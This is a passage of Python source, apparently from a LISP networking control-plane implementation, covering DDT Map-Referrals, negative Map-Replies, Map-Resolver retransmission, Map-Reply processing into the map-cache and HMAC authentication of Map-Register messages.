    if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
    return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):

    #
    # XOR the two addresses; the leftmost set bit of the result is the first
    # position where they differ, and its bit index from the left is the
    # candidate mask-length for the negative prefix.
    #
    diff = eid.hash_address(entry_prefix)
    bit_count = eid.addr_length() * 8

    candidate = 0
    for candidate in range(bit_count):
        if (diff & (1 << (bit_count - candidate - 1))): break
    #endfor

    #
    # Keep the longest mask-length found across all prefixes walked so far.
    #
    if (candidate > neg_prefix.mask_len): neg_prefix.mask_len = candidate
    return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
    eid, auth_prefix, neg_prefix = parms

    #
    # Skip entries that cannot influence the negative prefix: without an
    # auth-prefix, the entry must share instance-id and AFI with the EID;
    # with one, the entry must be more-specific than the auth-prefix.
    #
    if (auth_prefix == None):
        skip = (entry.eid.instance_id != eid.instance_id or
            entry.eid.afi != eid.afi)
    else:
        skip = (entry.eid.is_more_specific(auth_prefix) == False)
    #endif
    if (skip): return([True, parms])

    #
    # Candidate prefix, widen the negative mask-length if it matches deeper.
    #
    lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
    return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):

    #
    # Distinguished-names and geo-prefixes are not binary addresses, so no
    # negative prefix can be computed for them.
    #
    if (eid.is_binary() == False): return(eid)

    auth_prefix = ddt_entry.eid
    auth_str = ddt_entry.print_eid_tuple()

    neg = lisp_address(eid.afi, "", 0, 0)
    neg.copy_address(eid)
    neg.mask_len = 0

    #
    # Walk the supplied cache, widening the mask-length until the result
    # covers no configured entry under the auth-prefix.
    #
    eid, auth_prefix, neg = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, auth_prefix, neg))

    #
    # Keep only the high-order bits covered by the computed mask-length.
    #
    neg.mask_address(neg.mask_len)

    lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
        "using auth-prefix {} is {}").format(green(eid.print_address(), False),
        auth_str, neg.print_prefix()))
    return(neg)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
    """
    Compute the negative EID-prefix (and group-prefix for (S,G) requests)
    to return in a Map-Referral, never shorter than a configured
    authoritative prefix. Returns [neg_prefix, gneg_prefix, action] where
    action is DELEGATION_HOLE when an auth-prefix covers the EID and
    NOT_AUTH otherwise (NOT_AUTH also when no ddt-cache entry exists, with
    host-length prefixes).
    """
    neg_prefix = lisp_address(eid.afi, "", 0, 0)
    neg_prefix.copy_address(eid)
    neg_prefix.mask_len = 0
    gneg_prefix = lisp_address(group.afi, "", 0, 0)
    gneg_prefix.copy_address(group)
    gneg_prefix.mask_len = 0
    auth_prefix = None
    #
    # Look for auth-prefix in DDT cache. If not found, we return the host
    # based EID in a negative Map-Referral, action non-authoritative.
    #
    if (group.is_null()):
        ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
        if (ddt_entry == None):
            neg_prefix.mask_len = neg_prefix.host_mask_len()
            gneg_prefix.mask_len = gneg_prefix.host_mask_len()
            return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
        #endif
        cache = lisp_sites_by_eid
        if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
    else:
        # (S,G) case: the group drives the ddt-cache lookup; the group's
        # negative prefix is computed over the site cache here, the
        # source-EID's over the entry's source cache below.
        ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
        if (ddt_entry == None):
            neg_prefix.mask_len = neg_prefix.host_mask_len()
            gneg_prefix.mask_len = gneg_prefix.host_mask_len()
            return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
        #endif
        if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
        group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
            lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
        gneg_prefix.mask_address(gneg_prefix.mask_len)
        lprint(("Least specific prefix computed from site-cache for " + \
            "group EID {} using auth-prefix {} is {}").format( \
            group.print_address(), auth_prefix.print_prefix() if \
            (auth_prefix != None) else "'not found'",
            gneg_prefix.print_prefix()))
        cache = ddt_entry.source_cache
    #endif
    #
    # Return the auth-prefix if we found it in the DDT cache.
    #
    action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
        LISP_DDT_ACTION_NOT_AUTH
    #
    # Walk looking for the shortest prefix that DOES not match any site EIDs
    # configured.
    #
    eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
        (eid, auth_prefix, neg_prefix))
    #
    # Store high-order bits that are covered by the mask-length.
    #
    neg_prefix.mask_address(neg_prefix.mask_len)
    lprint(("Least specific prefix computed from site-cache for EID {} " + \
        "using auth-prefix {} is {}").format( \
        green(eid.print_address(), False),
        auth_prefix.print_prefix() if (auth_prefix != None) else \
        "'not found'", neg_prefix.print_prefix()))
    return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
    action, eid_prefix, group_prefix):
    """
    Map-Server: build and send a Map-Referral answering 'map_request'
    back to 'ecm_source'. 'action' is the LISP_DDT_ACTION_* code chosen by
    the caller; eid_prefix/group_prefix go into the EID-record (recomputed
    as negative prefixes for SITE_NOT_FOUND). The record TTL and the
    incomplete bit are derived from the action and from whether the
    matching ddt-cache entry is an ms-peer.
    """
    eid = map_request.target_eid
    group = map_request.target_group
    nonce = map_request.nonce
    # NOTE(review): this assignment is superseded by the unconditional
    # action checks below; kept as-is.
    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
    #
    # Build Map-Server specific Map-Referral.
    #
    map_referral = lisp_map_referral()
    map_referral.record_count = 1
    map_referral.nonce = nonce
    packet = map_referral.encode()
    map_referral.print_map_referral()
    incomplete = False
    #
    # Figure out what action code, EID-prefix, and ttl to return in the EID-
    # record. Temporary return requested prefix until we have lisp_ms_compute_
    # neg_prefix() working.
    #
    if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
        eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
            group)
        ttl = 15
    #endif
    if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
    if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
    if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
    if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
    is_ms_peer = False
    rloc_count = 0
    ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
    if (ddt_entry != None):
        rloc_count = len(ddt_entry.delegation_set)
        is_ms_peer = ddt_entry.is_ms_peer_entry()
        ddt_entry.map_referrals_sent += 1
    #endif
    #
    # Conditions when the incomplete bit should be set in the Map-Referral.
    #
    if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
    if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
        incomplete = (is_ms_peer == False)
    #endif
    #
    # Store info in EID-record.
    #
    eid_record = lisp_eid_record()
    eid_record.rloc_count = rloc_count
    eid_record.authoritative = True
    eid_record.action = action
    eid_record.ddt_incomplete = incomplete
    eid_record.eid = eid_prefix
    eid_record.group= group_prefix
    eid_record.record_ttl = ttl
    packet += eid_record.encode()
    eid_record.print_record(" ", True)
    #
    # Build referral-set.
    #
    if (rloc_count != 0):
        for ddt_node in ddt_entry.delegation_set:
            rloc_record = lisp_rloc_record()
            rloc_record.rloc = ddt_node.delegate_address
            rloc_record.priority = ddt_node.priority
            rloc_record.weight = ddt_node.weight
            rloc_record.mpriority = 255
            rloc_record.mweight = 0
            rloc_record.reach_bit = True
            packet += rloc_record.encode()
            rloc_record.print_record(" ")
        #endfor
    #endif
    #
    # Build packet and send Map-Referral message to the source of the
    # Map-Request.
    #
    if (map_request.nonce != 0): port = LISP_CTRL_PORT
    lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
    return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
    xtr_id, pubsub):
    '''
    Build and send a negative Map-Reply: an EID-record with a specific
    action code and an empty locator-set. When the triggering Map-Request
    was a subscribe-request, answer with a Map-Notify instead.
    '''
    lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
        format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
        red(dest.print_address(), False)))
    #
    # Unicast lookups are natively forwarded, multicast lookups are dropped.
    #
    if (group.is_null()):
        action = LISP_NATIVE_FORWARD_ACTION
    else:
        action = LISP_DROP_ACTION
    #endif
    #
    # A crypto-EID gets LISP_SEND_MAP_REQUEST_ACTION instead.
    #
    if (lisp_get_eid_hash(eid) != None):
        action = LISP_SEND_MAP_REQUEST_ACTION
    #endif
    reply_packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl,
        False, None, False, False)
    #
    # Subscribe-requests are acknowledged with a Map-Notify, everything
    # else with a plain Map-Reply.
    #
    if (pubsub):
        lisp_process_pubsub(sockets, reply_packet, eid, dest, port, nonce,
            ttl, xtr_id)
    else:
        lisp_send_map_reply(sockets, reply_packet, dest, port)
    #endif
    return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
    '''
    Timer callback on a Map-Resolver: retransmit a queued DDT Map-Request.
    Charges a no-response against the referral-node used last time, gives
    up after LISP_MAX_MAP_NOTIFY_RETRIES, otherwise re-sends and re-arms
    the retransmit timer.
    '''
    seid_str = mr.mr_source.print_address()
    deid_str = mr.print_eid_tuple()
    nonce = mr.nonce
    #
    # Get referral-node for who we sent Map-Request to last time. We need
    # to increment the no-response counter for it.
    #
    if (mr.last_request_sent_to):
        last_node = mr.last_request_sent_to.print_address()
        ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1], True)
        if (ref and ref.referral_set.has_key(last_node)):
            ref.referral_set[last_node].no_responses += 1
        #endif
    #endif
    #
    # Did we reach the max number of retries? We are giving up since no
    # responses have been received.
    #
    if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
            format(green(deid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return
    #endif
    mr.retry_count += 1
    s = green(seid_str, False)
    d = green(deid_str, False)
    lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
        format(bold("Map-Request", False), "P" if mr.from_pitr else "",
        red(mr.itr.print_address(), False), s, d,
        lisp_hex_string(nonce)))
    #
    # Do referral lookup and send the DDT Map-Request again.
    #
    lisp_send_ddt_map_request(mr, False)
    #
    # Restart retransmit timer.
    #
    mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
        lisp_retransmit_ddt_map_request, [mr])
    mr.retransmit_timer.start()
    return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
    '''
    Select a referral-node from 'referral' among the up nodes with the best
    (numerically lowest) priority. The pick is spread deterministically by
    hashing the source/dest EIDs. Returns a lisp_referral_node() or None
    when no node is up.
    '''
    #
    # Gather the up nodes, then keep only those at the best priority,
    # preserving iteration order.
    #
    candidates = [n for n in referral.referral_set.values() if n.updown]
    if (candidates == []): return(None)
    best_priority = min([n.priority for n in candidates])
    best_set = [n for n in candidates if n.priority == best_priority]
    #
    # Hash the EID pair to pick one node, load-splitting across the set.
    #
    index = dest_eid.hash_address(source_eid) % len(best_set)
    return(best_set[index])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on an EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
    '''
    Look up the queued Map-Request's EID in the referral cache, pick a
    referral-node, and ECM-encapsulate the Map-Request to it. When
    send_to_root is True the best-match lookup is bypassed and the DDT
    root is used instead. Gives up (negative Map-Reply / dequeue) when no
    referral or reachable referral-node exists, or after 8 sends.
    '''
    lisp_sockets = mr.lisp_sockets
    nonce = mr.nonce
    itr = mr.itr
    mr_source = mr.mr_source
    eid_str = mr.print_eid_tuple()
    #
    # Check if the maximum allowable Map-Requests have been sent for this
    # map-request-queue entry.
    #
    if (mr.send_count == 8):
        lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
            green(eid_str, False), lisp_hex_string(nonce)))
        mr.dequeue_map_request()
        return
    #endif
    #
    # If caller wants us to use the root versus best match lookup. We only
    # do this once per Map-Request queue entry.
    #
    if (send_to_root):
        lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        mr.tried_root = True
        lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
    else:
        lookup_eid = mr.eid
        lookup_group = mr.group
    #endif
    #
    # Do longest match on EID into DDT referral cache.
    #
    referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
    if (referral == None):
        lprint("No referral cache entry found")
        lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
            nonce, itr, mr.sport, 15, None, False)
        return
    #endif
    ref_str = referral.print_eid_tuple()
    lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
        referral.print_referral_type()))
    ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
    if (ref_node == None):
        lprint("No reachable referral-nodes found")
        mr.dequeue_map_request()
        lisp_send_negative_map_reply(lisp_sockets, referral.eid,
            referral.group, nonce, itr, mr.sport, 1, None, False)
        return
    #endif
    lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
        format(ref_node.referral_address.print_address(),
        referral.print_referral_type(), green(eid_str, False),
        lisp_hex_string(nonce)))
    #
    # Encapsulate Map-Request and send out.
    #
    to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
        referral.referral_type == LISP_DDT_ACTION_MS_ACK)
    lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
        ref_node.referral_address, to_ms=to_ms, ddt=True)
    #
    # Do some stats.
    #
    mr.last_request_sent_to = ref_node.referral_address
    mr.last_sent = lisp_get_timestamp()
    mr.send_count += 1
    ref_node.map_requests_sent += 1
    return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
    sport, mr_source):
    '''
    Map-Resolver processing of a Map-Request received from an ITR: log it,
    queue it for reliable retransmission, and forward it into the DDT
    hierarchy via lisp_send_ddt_map_request().
    '''
    target_eid = map_request.target_eid
    target_group = map_request.target_group
    request_nonce = map_request.nonce
    source_str = green(mr_source.print_address(), False)
    dest_str = green(map_request.print_eid_tuple(), False)
    lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
        format("P" if map_request.pitr_bit else "",
        red(ecm_source.print_address(), False), source_str, dest_str,
        lisp_hex_string(request_nonce)))
    #
    # Queue the Map-Request. We need to reliably transmit it.
    #
    queue_entry = lisp_ddt_map_request(lisp_sockets, packet, target_eid,
        target_group, request_nonce)
    queue_entry.packet = packet
    queue_entry.itr = ecm_source
    queue_entry.mr_source = mr_source
    queue_entry.sport = sport
    queue_entry.from_pitr = map_request.pitr_bit
    queue_entry.queue_map_request()
    #
    # Kick off the first DDT lookup and transmission for this entry.
    #
    lisp_send_ddt_map_request(queue_entry, False)
    return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
    mr_source, mr_port, ddt_request, ttl):
    '''
    Dispatch a received Map-Request to every role this node plays.
    RLOC-probes are handled separately and return early; the Map-Server
    path also returns early, while ETR/MR/DDT processing can each run on
    the same message.
    '''
    orig_packet = packet
    map_request = lisp_map_request()
    packet = map_request.decode(packet, mr_source, mr_port)
    if (packet == None):
        lprint("Could not decode Map-Request packet")
        return
    #endif
    map_request.print_map_request()
    #
    # If RLOC-probe request, process separately.
    #
    if (map_request.rloc_probe):
        lisp_process_rloc_probe_request(lisp_sockets, map_request,
            mr_source, mr_port, ttl)
        return
    #endif
    #
    # Process SMR.
    #
    if (map_request.smr_bit):
        lisp_process_smr(map_request)
    #endif
    #
    # Process SMR-invoked Map-Request.
    #
    if (map_request.smr_invoked_bit):
        lisp_process_smr_invoked_request(map_request)
    #endif
    #
    # Do ETR processing of the Map-Request if we found a database-mapping.
    #
    if (lisp_i_am_etr):
        lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
            mr_port, ttl)
    #endif
    #
    # Do Map-Server processing of the Map-Request. Note this path returns:
    # a Map-Server answers (or refers) and does no further role processing.
    #
    if (lisp_i_am_ms):
        packet = orig_packet
        eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
            orig_packet, map_request, mr_source, mr_port, ecm_source)
        if (ddt_request):
            lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
                ecm_port, ddt_action, eid, group)
        #endif
        return
    #endif
    #
    # Map-Request is from an ITR destined to a Map-Resolver.
    #
    if (lisp_i_am_mr and not ddt_request):
        lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
            ecm_source, mr_port, mr_source)
    #endif
    #
    # Do DDT-node processing of the Map-Request.
    #
    if (lisp_i_am_ddt or ddt_request):
        packet = orig_packet
        lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
            ecm_port)
    #endif
    return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
    '''
    Record counters and RTT timing for the map-resolver that just returned
    a negative Map-Reply. A no-op when 'source' is not a configured
    map-resolver.
    '''
    resolver = lisp_get_map_resolver(source, None)
    if (resolver == None): return
    #
    # Bump the reply count and remember when we last heard from it.
    #
    resolver.neg_map_replies_received += 1
    resolver.last_reply = lisp_get_timestamp()
    #
    # Every 100 replies, restart the RTT accumulator for a fresh average.
    #
    if ((resolver.neg_map_replies_received % 100) == 0):
        resolver.total_rtt = 0
    #endif
    #
    # A nonce match lets us account the round-trip time of this exchange.
    #
    if (resolver.last_nonce == nonce):
        resolver.total_rtt += (time.time() - resolver.last_used)
        resolver.last_nonce = 0
    #endif
    #
    # Periodically clear the stored nonce.
    #
    if ((resolver.neg_map_replies_received % 10) == 0):
        resolver.last_nonce = 0
    #endif
    return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
    '''
    Process a received Map-Reply. For each EID-record: record negative
    Map-Reply stats, decode the RLOC-set, handle RLOC-probe replies,
    apply NAT-traversal RLOC filtering, and add or replace the map-cache
    entry. New map-cache entries trigger RLOC-probes to their best RLOCs.
    '''
    global lisp_map_cache
    map_reply = lisp_map_reply()
    packet = map_reply.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Reply packet")
        return
    #endif
    map_reply.print_map_reply()
    #
    # Process each EID record in Map-Reply message.
    #
    rloc_key_change = None
    for i in range(map_reply.record_count):
        eid_record = lisp_eid_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Reply packet")
            return
        #endif
        eid_record.print_record(" ", False)
        #
        # If negative Map-Reply, see if from a Map-Resolver, do some counting
        # and timing stats.
        #
        if (eid_record.rloc_count == 0):
            lisp_store_mr_stats(source, map_reply.nonce)
        #endif
        multicast = (eid_record.group.is_null() == False)
        #
        # If this is a (0.0.0.0/0, G) with drop-action, we don't want to
        # cache more-specific (S,G) entry. It is a startup timing problem.
        #
        if (lisp_decent_push_configured):
            action = eid_record.action
            if (multicast and action == LISP_DROP_ACTION):
                if (eid_record.eid.is_local()): continue
            #endif
        #endif
        #
        # Some RLOC-probe Map-Replies may have no EID value in the EID-record.
        # Like from RTRs or PETRs.
        #
        if (eid_record.eid.is_null()): continue
        #
        # Do not lose state for other RLOCs that may be stored in an already
        # cached map-cache entry.
        #
        if (multicast):
            mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
        else:
            mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
        #endif
        new_mc = (mc == None)
        #
        # Do not let map-cache entries from Map-Replies override gleaned
        # entries.
        #
        if (mc == None):
            glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
                None)
            if (glean): continue
        else:
            if (mc.gleaned): continue
        #endif
        #
        # Process each RLOC record in EID record.
        #
        rloc_set = []
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            rloc_record.keys = map_reply.keys
            packet = rloc_record.decode(packet, map_reply.nonce)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Reply packet")
                return
            #endif
            rloc_record.print_record(" ")
            # Reuse the cached RLOC object when it already exists so its
            # accumulated state (probe timers, keys) is preserved.
            old_rloc = None
            if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
            if (old_rloc):
                rloc = old_rloc
            else:
                rloc = lisp_rloc()
            #endif
            #
            # Copy RLOC data from record, add to locator-set. Check to see
            # if the RLOC has been translated by a NAT. If so, go get the
            # translated port and store in rloc entry.
            #
            port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
                source)
            rloc.echo_nonce_capable = map_reply.echo_nonce_capable
            if (rloc.echo_nonce_capable):
                addr_str = rloc.rloc.print_address_no_iid()
                if (lisp_get_echo_nonce(None, addr_str) == None):
                    lisp_echo_nonce(addr_str)
                #endif
            #endif
            #
            # Process state for RLOC-probe reply from this specific RLOC. And
            # update RLOC state for map-cache entry. Ignore an RLOC with a
            # different address-family of the received packet. The ITR really
            # doesn't know it can reach the RLOC unless it probes for that
            # address-family.
            #
            if (map_reply.rloc_probe and rloc_record.probe_bit):
                if (rloc.rloc.afi == source.afi):
                    lisp_process_rloc_probe_reply(rloc.rloc, source, port,
                        map_reply.nonce, map_reply.hop_count, ttl)
                #endif
            #endif
            #
            # Append to rloc-set array to be stored in map-cache entry.
            #
            rloc_set.append(rloc)
            #
            # Did keys change for this RLOC, flag it if so.
            #
            if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
                rloc_key_change = rloc
            #endif
        #endfor
        #
        # If the map-cache entry is for an xTR behind a NAT, we'll find an
        # RTR RLOC (which is priority 254). Store private RLOCs that may
        # come along with the RTR RLOC because the destination RLOC could
        # be behind the same NAT as this ITR. This ITR, however could be
        # behind another NAT or in public space. We want to mark the
        # private address RLOC unreachable for the two later cases.
        #
        if (map_reply.rloc_probe == False and lisp_nat_traversal):
            new_set = []
            log_set = []
            for rloc in rloc_set:
                #
                # Set initial state for private RLOCs to UNREACH and test
                # with RLOC-probes if up behind same NAT.
                #
                if (rloc.rloc.is_private_address()):
                    rloc.priority = 1
                    rloc.state = LISP_RLOC_UNREACH_STATE
                    new_set.append(rloc)
                    log_set.append(rloc.rloc.print_address_no_iid())
                    continue
                #endif
                #
                # RTR should not put RTR RLOC in map-cache. But xTRs do. None
                # RTR RLOCs should only go in the RTR map-cache.
                #
                if (rloc.priority == 254 and lisp_i_am_rtr == False):
                    new_set.append(rloc)
                    log_set.append(rloc.rloc.print_address_no_iid())
                #endif
                if (rloc.priority != 254 and lisp_i_am_rtr):
                    new_set.append(rloc)
                    log_set.append(rloc.rloc.print_address_no_iid())
                #endif
            #endfor
            if (log_set != []):
                rloc_set = new_set
                lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
            #endif
        #endif
        #
        # If any RLOC-records do not have RLOCs, don't put them in the map-
        # cache.
        #
        new_set = []
        for rloc in rloc_set:
            if (rloc.json != None): continue
            new_set.append(rloc)
        #endfor
        if (new_set != []):
            count = len(rloc_set) - len(new_set)
            lprint("Pruning {} no-address RLOC-records for map-cache".format( \
                count))
            rloc_set = new_set
        #endif
        #
        # If this is an RLOC-probe reply and the RLOCs are registered with
        # merge semantics, this Map-Reply may not include the other RLOCs.
        # In this case, do not wipe out the other RLOCs. Get them from the
        # existing entry.
        #
        if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
        #
        # If we are overwriting the rloc-set cached in the map-cache entry,
        # then remove the old rloc pointers from the RLOC-probe list.
        #
        rloc_set_change = new_mc
        if (mc and rloc_set != mc.rloc_set):
            mc.delete_rlocs_from_rloc_probe_list()
            rloc_set_change = True
        #endif
        #
        # Add to map-cache. If this is a replace, save uptime.
        #
        uptime = mc.uptime if (mc) else None
        if (mc == None):
            mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
            mc.mapping_source = source
            mc.map_cache_ttl = eid_record.store_ttl()
            mc.action = eid_record.action
            mc.add_cache(rloc_set_change)
        #endif
        add_or_replace = "Add"
        if (uptime):
            mc.uptime = uptime
            mc.refresh_time = lisp_get_timestamp()
            add_or_replace = "Replace"
        #endif
        lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
            green(mc.print_eid_tuple(), False), len(rloc_set)))
        #
        # If there were any changes to the RLOC-set or the keys for any
        # existing RLOC in the RLOC-set, tell the external data-plane.
        #
        if (lisp_ipc_dp_socket and rloc_key_change != None):
            lisp_write_ipc_keys(rloc_key_change)
        #endif
        #
        # Send RLOC-probe to highest priority RLOCs if this is a new map-cache
        # entry. But if any of the RLOCs were used before in other map-cache
        # entries, no need to send RLOC-probes.
        #
        if (new_mc):
            probe = bold("RLOC-probe", False)
            for rloc in mc.best_rloc_set:
                addr_str = red(rloc.rloc.print_address_no_iid(), False)
                lprint("Trigger {} to {}".format(probe, addr_str))
                lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
            #endfor
        #endif
    #endfor
    return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents stored in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
    '''
    Compute the HMAC over a Map-Register packet, store it in the
    lisp_map_register() object, and encode it into the packet buffer.
    Returns the packet unchanged when no authentication is configured.
    '''
    if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
    #
    # Zero the authentication field first so it is excluded from the hash.
    #
    zeroed_packet = map_register.zero_auth(packet)
    map_register.auth_data = lisp_hash_me(zeroed_packet, map_register.alg_id,
        password, False)
    #
    # Write the packed hash value back into the packet buffer.
    #
    return(map_register.encode_auth(zeroed_packet))
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
    '''
    Compute an HMAC over 'packet' with 'password' using the hash algorithm
    selected by alg_id. Returns the digest (hex string when do_hex is True,
    raw bytes otherwise), True for LISP_NONE_ALG_ID, or None for an
    unsupported alg_id.
    '''
    if (alg_id == LISP_NONE_ALG_ID): return(True)
    if (alg_id == LISP_SHA_1_96_ALG_ID):
        hashalg = hashlib.sha1
    elif (alg_id == LISP_SHA_256_128_ALG_ID):
        hashalg = hashlib.sha256
    else:
        #
        # Fix: an unrecognized alg-id used to crash with an unbound
        # 'hashalg'. Return None so callers treat it as an auth mismatch.
        #
        lprint("Unsupported authentication alg-id {}".format(alg_id))
        return(None)
    #endif
    if (do_hex):
        hashval = hmac.new(password, packet, hashalg).hexdigest()
    else:
        hashval = hmac.new(password, packet, hashalg).digest()
    #endif
    return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
    '''
    Recompute the sha1/sha2 authentication hash over a Map-Register and
    compare it to the value carried in the packet (stored in class
    lisp_map_register). Returns True on match or when no auth configured.
    '''
    if (alg_id == LISP_NONE_ALG_ID): return(True)
    computed = lisp_hash_me(packet, alg_id, password, True)
    if (computed == auth_data): return(True)
    #
    # Show both values so a password mismatch is easy to diagnose.
    #
    lprint("Hashed value: {} does not match packet value: {}".format( \
        computed, auth_data))
    return(False)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
    '''
    Timer callback: retransmit a queued Map-Notify that has not been
    acknowledged. Dequeues the entry after LISP_MAX_MAP_NOTIFY_RETRIES,
    otherwise re-sends and re-arms the retransmit timer.
    '''
    dest = map_notify.etr
    port = map_notify.etr_port
    #
    # Did we reach the max number of retries? We are giving up since no
    # Map-Notify-Acks have been received.
    #
    if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
        lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
            format(map_notify.nonce_key, red(dest.print_address(), False)))
